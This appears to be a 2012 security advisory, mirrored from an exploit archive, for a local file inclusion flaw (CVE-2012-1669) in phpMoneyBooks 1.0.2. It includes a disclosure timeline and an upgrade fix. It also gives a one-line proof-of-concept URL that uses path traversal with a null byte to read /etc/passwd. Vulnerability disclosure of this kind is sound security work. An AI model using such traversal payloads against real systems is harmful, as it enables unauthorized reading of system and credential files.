Skip to content
cyberexploits
webappphptext

phpMoneyBooks 1.0.2 - Local File Inclusion

phpMoneyBooks 1.0.2 - Local File Inclusion

Publié le 2012-03-22

Code source

Épinglé au commit 7eac4c3a2ce5
textplatforms/php/webapps/18648.txt7eac4c3a
raw
'phpMoneyBooks' Local File Inclusion (CVE-2012-1669)

Mark Stanislav - mark.stanislav@gmail.com





I. DESCRIPTION

---------------------------------------

A vulnerability exists in index.php for module handling that allows for local file inclusion using a null-byte attack on the 'module' GET parameter.



 

II. TESTED VERSION

---------------------------------------

1.0.2





III. PoC EXPLOIT

---------------------------------------

http://localhost/phpMoneyBooks102/index.php?module=../../../../../etc/passwd%00





IV. NOTES 

---------------------------------------

* magic_quotes_gpc must be disabled and PHP must be < 5.3.4 for null-byte attacks to work





V. SOLUTION

---------------------------------------

Upgrade to 1.0.3 or above.





VI. REFERENCES

---------------------------------------

http://phpmoneybooks.com/

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1669





VII. TIMELINE

---------------------------------------

02/29/2012 - Initial vendor disclosure

03/01/2012 - Vendor patched and released an updated version

03/22/2012 - Public disclosure
Voir sur GitHub